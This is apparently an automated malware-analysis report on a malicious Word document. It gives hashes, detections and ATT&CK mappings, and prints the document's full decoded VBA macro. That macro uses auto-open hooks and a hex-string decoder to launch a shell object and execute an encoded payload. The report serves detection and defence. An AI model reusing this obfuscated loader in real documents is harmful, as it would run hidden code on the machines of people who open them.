Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fdcb72b9cb56c2c5…

MALICIOUS

Office (OLE)

102.0 KB Created: 2018-04-18 11:12:00 Authoring application: Microsoft Office Word First seen: 2018-06-21
MD5: 267b56483697a6838fdaeb23ad3b5221 SHA-1: e0fed8465ac9a4a937c19cd72c16e97ffff2b15f SHA-256: fdcb72b9cb56c2c5de12de8fae4e214372309c3648e9cbf56018e156fa55efba
344 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer

The file contains heavily obfuscated VBA macros, including an Auto_Open macro, which are designed to execute arbitrary code. The critical heuristic 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' indicates the presence of a custom decoder and calls to CreateObject, Shell, and exec, suggesting the macro's purpose is to download and run a secondary payload. The ClamAV detection 'Xls.Malware.Valyria-6700358-0' further confirms its malicious nature.

Heuristics 10

  • ClamAV: Xls.Malware.Valyria-6700358-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Valyria-6700358-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Public Sub NJI_L()
    Dim GB_Z As Object: Set GB_Z = VBA.CreateObject(ZDX_KGX("938F9FAEA5ACB06A8FA4A1A8A8"))
    Dim IDO_AA As String
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Sub
Public Sub Document_Open()
    Application.Run ZDX_KGX("859B878E81928592847F8D")
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    End Sub
Sub Workbook_Open()
    Application.Run "ThisWorkbook." & ZDX_KGX("859B878E81928592847F8D")
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    End Sub
Public Sub Auto_Open()
    Application.Run ZDX_KGX("859B878E81928592847F8D")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Public Sub NJI_L()
    Dim GB_Z As Object: Set GB_Z = VBA.CreateObject(ZDX_KGX("938F9FAEA5ACB06A8FA4A1A8A8"))
    Dim IDO_AA As String
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3327 bytes
SHA-256: b73e37c96fc498c486a5902e30cb6fab51a610ce2ae007840e2f8f5250ce1aba
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 8 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Public Sub NJI_L()
    Dim GB_Z As Object: Set GB_Z = VBA.CreateObject(ZDX_KGX("938F9FAEA5ACB06A8FA4A1A8A8"))
    Dim IDO_AA As String
IDO_AA = "7B5C7B9F7B7B898E7B7A7B4D48AD7B7B8F4D50BA7BABB47B8D7BA27B7B5E4D609254867B5D7B7B877B987B7B724D8442B3BB8A7BA052737BA9494EB97BB6B3A869B07B7B63727BA2767B7B737B7B967C769C97977B7B7B7B51507B957B5E7B75BB7B92907B7D7B7B907B707B7B7B7E685B577B7B7BB74"
Dim B_XO As String
B_XO = "E7B5D7B7B7B467B8E7B887B7B7B557B7B695F467BAF9C45537B3E7B7B4A7B7E8B5B5B99AF7BB17B9590577B987B417B7BB97BAD6C7B817B7BB47B7B7BB37B4B7B6E7BB37B7B7B7B70935A805E7B7B7B827B93B9A54DADAE7B7B547B61A77B7BB347495C7B7B7B7B7B7B3C9B4B7B7B7D7B5C487B7B7B7B"
Dim IR_PM As String
IR_PM = "7B7B4CB67B4A7B7D7B863DAC7B747BBB7B507B7B7BB97B7B7B7BAD7B7B6D627B7BABAC7B7B7B7B8889504A5C7B44637B7B54B97B7B6EB27B7B66B67B68547BAA7B9E7B7B7B638C7B7BA47BA2687B856B7B557B7B7B79787B567B5C7B5D7B70A39A7BB17B7B927B49737B7B8B6C916F7B6D7B58607BA6B"
Dim XMX_VE As String
XMX_VE = "19F6C7BA6A8927B7B7B7BA37B8E997BB1AF8C419EAF7BAE7B7B3E7B7B5F7B45634F7B8F7B7B987B7B7B7B7BAA7BB57B7B7B8EA14E7B7D98B9AC8FAA3CB47BB47BB99B467B7B537BB4B47B7F7B5D7B5F534AB87B7B3C3E4E7B8B7B7D5A7B777B967B7BBBAA697B7B7B7B6C7B7B977B6C927B7B7B7BB9B8"
Dim LP_K As String
LP_K = "997B7B9566B5967B7BB8807B7B7B7B7BB9905B7BA37B50627B464D7B7B7B7B4AB15EB2BA7BAB597B467B7BB47B817B7B4CBA7B7B7B517B7BA25BA47B7B807B7B7B627B6E9E7B7B3D7F98617B7B68AA557B7B6C7BA29C7B7B7B798C7B7BB0A47B7B7C5A48B77B7B7B7BA07BA28C7B76967BB47B7BB67B5"
Dim QQU_AA As String
QQU_AA = "B7B7BA97B7B887F7B7B7BB37B7658B0943E7B6D7D563E7B7B7B7B96565C945F7B7C44638F5C7B7B7B8A7BA87BB1A24196595A7B9A8F7B7BB67B5F7B9E7B7B8A8F7B7B5089407B7B7B5B7B7EA07B8BBB917B3F75A8B77BAA7B7BA07B7B6B707BA05551B78D7B9177846C7B707B97514B7B9249427B517B"
Dim CL_IKX As String
CL_IKX = "84497B7B67B9657B7B7B6C7B877B7B697BA57B7B777B7B697B907BB85D6A7B8A6D7BA97B7B667B5AB86B857BB97BB47B64AD7B7B607BB791587BA3648B739A7BB07B557BA27B7B7B457B7BAA7B7B7B7B8F7B7B7B667B8D547B987B7B807B7D7B7B7B7B7B997B8E7B7B7B847BA987B17B667BA07BB38A7"
Dim X_P As String
X_P = "B88B8AF3FB67B7B7B866A7E7B7B6F7B7BAF6E84B29086959C5E9E7B7B5872867BB77B8AAC4C417B5F5F596E737B7B7B7B3F577B7B63657B557BBA4475697B7B7BA88E807B659F687B8E6D68626597A77B7B606F6A497B7B947B93A17B7B7B7B62777E967B7B3F7B7B537B7B7B7B7B8B4FAB79457B7B7BA87B7B7B7B7B7BA477427B7B3D7B7B7B917B7B7B5D7B975DA252AF7A7B7B9EAE967B467B5A7B7B846F577B7B7B4589877B"

    GB_Z.Exec (ZDX_KGX(ActiveDocument.Variables("ED3OX").Value))
End Sub
Public Sub Auto_Open()
    Application.Run ZDX_KGX("859B878E81928592847F8D")
End Sub
Sub Workbook_Open()
    Application.Run "ThisWorkbook." & ZDX_KGX("859B878E81928592847F8D")
End Sub
Public Function ZDX_KGX(ByVal GB_Z As String)
   Dim MJE_VTP As String
   Dim WM_M As Long
   For WM_M = 1 To Len(GB_Z) Step 2
        MJE_VTP = MJE_VTP & Chr(Asc(Chr("&H" & Mid(GB_Z, WM_M, 2))) - 60)
   Next
   ZDX_KGX = MJE_VTP
End Function
Sub I_KREVIVHCQ()
    NJI_L
End Sub
Public Sub Document_Open()
    Application.Run ZDX_KGX("859B878E81928592847F8D")
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.